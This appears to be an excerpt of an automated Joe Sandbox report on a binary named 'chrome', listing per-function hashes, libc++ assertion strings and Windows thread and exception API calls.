                                                    • Instruction Fuzzy Hash: CAD14775A08351DFC714CF18C08065AFBE2AFC8324F1A8A6DE99A6B351C771EC45CB92
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DDC328
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DDC319
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds
                                                    • API String ID: 0-112411280
                                                    • Opcode ID: c3255b8b2301fd4e5eafafc68cfa42bd69bf3789358ffbb4107ff5fe5a1e6a1d
                                                    • Instruction ID: 70a0ffdffaf83b0fd1b373d1ca218c954ee17f116661c9fd1312094cb52017ef
                                                    • Opcode Fuzzy Hash: c3255b8b2301fd4e5eafafc68cfa42bd69bf3789358ffbb4107ff5fe5a1e6a1d
                                                    • Instruction Fuzzy Hash: FAC12230E147968FC7168F39D85126AF7A1EFDA304F1AD31BE98537691E7309882CB80
                                                    Similarity
                                                    • API ID:
                                                    • String ID: __next_prime overflow
                                                    • API String ID: 0-822664188
                                                    • Opcode ID: 9b77ed37957879b95285664cb04040ecc7c61777b2d86cbde44901dfce31b87b
                                                    • Instruction ID: b43171e3f2bf97b00923a42881a0c3032902d10bee4cf51b392c2c96cb0f5a5a
                                                    • Opcode Fuzzy Hash: 9b77ed37957879b95285664cb04040ecc7c61777b2d86cbde44901dfce31b87b
                                                    • Instruction Fuzzy Hash: 0E224A71B0022B4B8B1CCE2D88E056EF2D3ABD8244B2EC176D90AD7755F931DD4A82A5
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00E05FA2
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                    • API String ID: 0-2888085009
                                                    • Opcode ID: 3e28ab7d673c63de7762d1de6ca7d6f3b55c5ba457c89224eb2aa0812963c6d9
                                                    • Instruction ID: d5929b36d86c50e1cc17fba2aae1088a8eedef9401b8e5394a2c5abe44555f93
                                                    • Opcode Fuzzy Hash: 3e28ab7d673c63de7762d1de6ca7d6f3b55c5ba457c89224eb2aa0812963c6d9
                                                    • Instruction Fuzzy Hash: 22628175A00605DFCB14CF14C490BEAB7B2FF44318F28856DD89AAB382D731B992CB91
                                                    APIs
                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00E4ED00,?,?,00000008,?,?,00E526ED,00000000), ref: 00E4EFD2
                                                    Similarity
                                                    • API ID: ExceptionRaise
                                                    • String ID:
                                                    • API String ID: 3997070919-0
                                                    • Opcode ID: 14e988d52e8e9e382178716f5429a01d49edb5b2cf1913200d745e4555726145
                                                    • Instruction ID: 2c347128737637e8f5c4b7af186fd7a5774c5d1a2e1dc9a983e21fee9e9bc6e5
                                                    • Opcode Fuzzy Hash: 14e988d52e8e9e382178716f5429a01d49edb5b2cf1913200d745e4555726145
                                                    • Instruction Fuzzy Hash: EFB15E31610608DFD719CF28D48ABA57BE0FF45368F259698E899DF3A2C335E991CB40
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00E0AC35
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds
                                                    • API String ID: 0-1033426729
                                                    • Opcode ID: a303b4afee6b903a2b4f11902852cc3bb2bcd06edca7f5c32c57811d9108c3ad
                                                    • Instruction ID: 6a31359e65a478cd3c96be5d5abaf5777e7995aaf0054a5d7d6840db17af7671
                                                    • Opcode Fuzzy Hash: a303b4afee6b903a2b4f11902852cc3bb2bcd06edca7f5c32c57811d9108c3ad
                                                    • Instruction Fuzzy Hash: 0EC1A331B0031D8FDB38DE6884C456DB3A2AB88315B2FA67ED5657B2D1D6319CC2C693
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DFC755
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds
                                                    • API String ID: 0-2233721302
                                                    • Opcode ID: 610b8f61b4b4d35b38d76c664cdc8465f27954566b736cfbe97aa154ce4a35e6
                                                    • Instruction ID: 56a9048e1f0ae43c1790e1503f05a20f510d1e08337f208b98d2c087c7dec096
                                                    • Opcode Fuzzy Hash: 610b8f61b4b4d35b38d76c664cdc8465f27954566b736cfbe97aa154ce4a35e6
                                                    • Instruction Fuzzy Hash: 85E10776A183199FC714DF18C180A2AB7E2BBC8320F1ADA6DE99957355C730FC45CB92
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DB6C73
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds
                                                    • API String ID: 0-2233721302
                                                    • Opcode ID: 0b12cdbdca3be37aadd8f9bbf53a501031fc808ad1a3551d1e93c8a7eb05178b
                                                    • Instruction ID: 3ef5904013b035350b1352bb92c4a18a771b061a9450e799f111a5d7ef36a0f6
                                                    • Opcode Fuzzy Hash: 0b12cdbdca3be37aadd8f9bbf53a501031fc808ad1a3551d1e93c8a7eb05178b
                                                    • Instruction Fuzzy Hash: 54D1D475600B01CFC724CF29C580A56BBF2FF98310B698A6DD89A8BB65D774F845CB90
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DF5DF2
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds
                                                    • API String ID: 0-2233721302
                                                    • Opcode ID: c17530d94b803ffe8311c1b7ac237a817f65a64d2ef1beed6c75eb677537803f
                                                    • Instruction ID: ce447e56262db9710d3d9b24d6561a11c3abe7cfc4f2549d88032269b45915c8
                                                    • Opcode Fuzzy Hash: c17530d94b803ffe8311c1b7ac237a817f65a64d2ef1beed6c75eb677537803f
                                                    • Instruction Fuzzy Hash: BDD13776A087159FC714CF18C48062ABBE1FF88320F1AC95DEA99AB315D370EC41CB92
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\optional:785: assertion this->has_value() failed: optional operator-> called on a disengaged value, xrefs: 00DB8C6A
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\optional:785: assertion this->has_value() failed: optional operator-> called on a disengaged value
                                                    • API String ID: 0-3475978879
                                                    • Opcode ID: f93c29e4a2ba9875f061b2d1c75fd1d956cee7349675a134035e9e4ee089c086
                                                    • Instruction ID: a623e480d1638ecb2ae8ffeda377df5426fc12ce67b5f14b9597c4fc5a6a221b
                                                    • Opcode Fuzzy Hash: f93c29e4a2ba9875f061b2d1c75fd1d956cee7349675a134035e9e4ee089c086
                                                    • Instruction Fuzzy Hash: A2A11774608341DFC718CF29C0909AABBE6BFD8344F14892EE59757761CB30E985DB62
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2221463139
                                                    • Opcode ID: 0461ff951b208bbecce0a93c254a18c3957abf9619e816c6407a41dbe9aac2ae
                                                    • Instruction ID: 3e7348e849ab4aa62f9ba98801fd37c4dba379b9d30a972d16db1d0f1cc5d14b
                                                    • Opcode Fuzzy Hash: 0461ff951b208bbecce0a93c254a18c3957abf9619e816c6407a41dbe9aac2ae
                                                    • Instruction Fuzzy Hash: DC412A76B052168FCF18CE2CD4901BAFBA3FF96711B1D806DD899AB315DA319C4693B0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: "
                                                    • API String ID: 0-123907689
                                                    • Opcode ID: def300ad888e03b9c1c00f14dfde525097cc811a1cef64a54d602cc32a4f79d6
                                                    • Instruction ID: bf2c2c4c7cf33bb470f0bba31343e61ae1116045b851e3d558b9a85958bd1a1b
                                                    • Opcode Fuzzy Hash: def300ad888e03b9c1c00f14dfde525097cc811a1cef64a54d602cc32a4f79d6
                                                    • Instruction Fuzzy Hash: 586162B1D147858FD700CF24D88196ABBA1BFDA314F15976EF8C56B212EBB0D980C792
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00D3C78F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                    • API String ID: 0-2888085009
                                                    • Opcode ID: d9227e84208f71314bb80fde6c8d1f8490f3fbe4a0c17f01aea375fc7877e5ea
                                                    • Instruction ID: fa527cdbf854b43f2c0ce74785f4c6ba72108acbc8e9e5ca20983da102c218ad
                                                    • Opcode Fuzzy Hash: d9227e84208f71314bb80fde6c8d1f8490f3fbe4a0c17f01aea375fc7877e5ea
                                                    • Instruction Fuzzy Hash: F93131B52106A28EE7289F25EC2B7327793DB85311F2D813AD6178B7E2DB789104CB10
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4d6c9128871f1856d39bcc1edb13b036d26e4810c246a284f6b4713b95345826
                                                    • Instruction ID: 8b52a99c3c82da33b0224cd5da6ef575cc527953c27e665106d246d84919b78b
                                                    • Opcode Fuzzy Hash: 4d6c9128871f1856d39bcc1edb13b036d26e4810c246a284f6b4713b95345826
                                                    • Instruction Fuzzy Hash: 242273735417044BE318CE2ECC815C2B3E3AFD822475F857EC926CB796EEB9A6174548
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a5bfe616bfbc4910b719157b54d06664c556314a9e0a999e2ae46a4eabe35072
                                                    • Instruction ID: 0e13ab01de272247ebb8771f9909b5fcf9dfe60fc34dca2f60a12bd63e132825
                                                    • Opcode Fuzzy Hash: a5bfe616bfbc4910b719157b54d06664c556314a9e0a999e2ae46a4eabe35072
                                                    • Instruction Fuzzy Hash: F8C12330A0866A8FDB24CF68ED84ABAB7B1FF10308F146619D652BB751C371ED06CB10
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 05e6b3220bccc724a6c8f4dd9c5fbf611fff832a40c3537b7d16194dda6b1720
                                                    • Instruction ID: 13234a4a6063a09b4f49370cfe1433cd14a622d7b5cfe0a8da801b52a243e9af
                                                    • Opcode Fuzzy Hash: 05e6b3220bccc724a6c8f4dd9c5fbf611fff832a40c3537b7d16194dda6b1720
                                                    • Instruction Fuzzy Hash: 4FB1F23190862ACBCB24DE68ED556BEBBF1AF01308F18661DD652F76A1C730ED01CB41
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c10c948e2f09096195d9baeeae570942aa493597e6642a0c3e209b0d645ef6b
                                                    • Instruction ID: aa22f30218628983785910d689e6d98222bae31c3587372db7bdf7e3b39ad2f9
                                                    • Opcode Fuzzy Hash: 1c10c948e2f09096195d9baeeae570942aa493597e6642a0c3e209b0d645ef6b
                                                    • Instruction Fuzzy Hash: A1917D75E002298BDF04CFA9C8807EEFBF2BB89714F25811AC855B7341CB756D469BA4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6ac10dae03c3f1761c1928d843817e4831fdde63c8e01056afbe86bc9c17678e
                                                    • Instruction ID: a4469d168ab0c64019f80229475721bd3687c3f82ab67238f7eda389f1bc1ba0
                                                    • Opcode Fuzzy Hash: 6ac10dae03c3f1761c1928d843817e4831fdde63c8e01056afbe86bc9c17678e
                                                    • Instruction Fuzzy Hash: 4E719272E002258BCB14CF6DC9412AEF7F6AFC4314F2A813AD954F73A1D6759C028BA0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fc362c2ffb57c6b1fdc15d8519223da781dcc89034d229f653650a77ea351441
                                                    • Instruction ID: 236d068060bdd85dd83eb239883ab49c0608dc09fc96d406fd1d9dae6409b67f
                                                    • Opcode Fuzzy Hash: fc362c2ffb57c6b1fdc15d8519223da781dcc89034d229f653650a77ea351441
                                                    • Instruction Fuzzy Hash: BF519FB0A005159BCB159F19D890A7EB7A5FF81314F1C892DE84AAB3C6DB31EC16C7A1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3e39ebab49ac8d6ec80898289b3fb636c046095ef96c6846cb62d20459f184f5
                                                    • Instruction ID: d61661ddfdfa15836e6046b86a49fe47d1dbdbfaa99dcd47c5a6dbb5dc36ff41
                                                    • Opcode Fuzzy Hash: 3e39ebab49ac8d6ec80898289b3fb636c046095ef96c6846cb62d20459f184f5
                                                    • Instruction Fuzzy Hash: 096194F1D10B858FDB00CF24D981AA6BBB0BFDA304F15939AE8856B253E774D584C751
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1d4287ac248362c97136562f94b2e2923ae13c14b45c50e788ef65c568e1df5d
                                                    • Instruction ID: 5b6c268a2655d4f9f18eeed6576f7e65ec87c5c05cd9e4aa5054c118517aca05
                                                    • Opcode Fuzzy Hash: 1d4287ac248362c97136562f94b2e2923ae13c14b45c50e788ef65c568e1df5d
                                                    • Instruction Fuzzy Hash: FC41D4B4F001054BDB149B29A85563A73A6E7C1322F54852EEC86AB34DEB71EC19C7F3
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 42a44b12e609a6ab67a79d8789513c8e6b0dd2b51445cecfd6f997748aea7aaf
                                                    • Instruction ID: 49af893a100cb855ec8c5137764b17d37ad7b55447b8f883e54768b18fe1d813
                                                    • Opcode Fuzzy Hash: 42a44b12e609a6ab67a79d8789513c8e6b0dd2b51445cecfd6f997748aea7aaf
                                                    • Instruction Fuzzy Hash: B131C675F002054BD7248F39A855B26B396EBC0304F584A3CD55E9738AEB71F815C7A2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 72dbc4a276d1246ff7ff63283253b8c771180fcbf53761fc09f072742dd1c2ab
                                                    • Instruction ID: 098db8e2dab0be4f373f8e347a3e1ad032eac58cce87a7d884817bfa03050f37
                                                    • Opcode Fuzzy Hash: 72dbc4a276d1246ff7ff63283253b8c771180fcbf53761fc09f072742dd1c2ab
                                                    • Instruction Fuzzy Hash: C0314875F002548FDB108F19E814A3977A2EBC4310B494628F84AAF366E770EC11C7F1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3b55b85746e3b150390d6180385d967b468e4f5c5553033ba5320840a84e087e
                                                    • Instruction ID: 217b84cf20693a798b0b7523eab7595f6b7962674134c39632d87d9fea910107
                                                    • Opcode Fuzzy Hash: 3b55b85746e3b150390d6180385d967b468e4f5c5553033ba5320840a84e087e
                                                    • Instruction Fuzzy Hash: 4B4194DAC19F8D0AD603173DA4831A3B720EEB35A8721EB47FCF4756A2F711A1956214
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 37b14d815e7bbedfe433da2e42fc6cc3e7408750979de1828b2bb736ca225cfe
                                                    • Instruction ID: bf317c9ca794a6ef214177f393d3d3aa31c1929186a7ce01bf40dcaac0b6b3c4
                                                    • Opcode Fuzzy Hash: 37b14d815e7bbedfe433da2e42fc6cc3e7408750979de1828b2bb736ca225cfe
                                                    • Instruction Fuzzy Hash: 0631B261A14F848BD320CF3D9811376BBE1AFA6304F198B1DD0DB9B256EB70B494C762
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9bd2b7d09e4ca0bc2e3859500c5e8bd939ccfef3581f09e0253150e471ccf535
                                                    • Instruction ID: ff92cbd943ce05490d31101d99c993514fff05717f0c0b60605fe7ec77e24804
                                                    • Opcode Fuzzy Hash: 9bd2b7d09e4ca0bc2e3859500c5e8bd939ccfef3581f09e0253150e471ccf535
                                                    • Instruction Fuzzy Hash: CE31B674F002054BCB149F2DE85593EB7E5EBC5310F44856DE8469B39AEA30E815C7A2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                    • Instruction ID: 0b4fdd809413c0d3a75860e7c6ebdfdca8f688c8dda1e3b7ff63184c7a8abd43
                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                    • Instruction Fuzzy Hash: 75115B772030B183D608863DFFB46B7A795EBC532872C637AD0416BB98CD22A962D600
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5df68c0d7bcbed49f05cd44b66c136474bb6682d7516cd60fab905d9cd43d954
                                                    • Instruction ID: 2ae507697e8726b125a410bafc9695bcd3d64976b5c8e3d3891927dd8787ccaa
                                                    • Opcode Fuzzy Hash: 5df68c0d7bcbed49f05cd44b66c136474bb6682d7516cd60fab905d9cd43d954
                                                    • Instruction Fuzzy Hash: D91103EEC2AF8C49D603573E9483591B350AEB75E4720E747FCB076262F721A5986314
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 00D52DAC
                                                    • GetCurrentThread.KERNEL32 ref: 00D52DB0
                                                    • GetCurrentProcess.KERNEL32 ref: 00D52DB8
                                                    • DuplicateHandle.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000002), ref: 00D52DC7
                                                    • GetCurrentThreadId.KERNEL32 ref: 00D52DF7
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00EFEDD0), ref: 00D52E04
                                                    • ReleaseSRWLockExclusive.KERNEL32(00EFEDD0,?,?,?), ref: 00D52E2F
                                                    • GetLastError.KERNEL32 ref: 00D52E4B
                                                    • SetLastError.KERNEL32(00000000), ref: 00D52E62
                                                    • GetCurrentThreadId.KERNEL32 ref: 00D52E77
                                                      • Part of subcall function 00D3C1E0: GetCurrentThread.KERNEL32 ref: 00D3C1F5
                                                      • Part of subcall function 00D3C1E0: SetThreadPriority.KERNEL32(00000000,00010000), ref: 00D3C207
                                                      • Part of subcall function 00D3C1E0: SetThreadPriority.KERNEL32(00000000,7FFFFFFF), ref: 00D3C21D
                                                      • Part of subcall function 00D3C1E0: GetCurrentThread.KERNEL32 ref: 00D3C23A
                                                      • Part of subcall function 00D3C1E0: SetThreadInformation.KERNEL32(00000000,00000003,?,0000000C), ref: 00D3C246
                                                    • GetCurrentThread.KERNEL32 ref: 00D52EFB
                                                    • GetThreadPriority.KERNEL32(00000000), ref: 00D52F02
                                                    • GetCurrentThreadId.KERNEL32 ref: 00D52F48
                                                      • Part of subcall function 00D536C0: TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D536D6
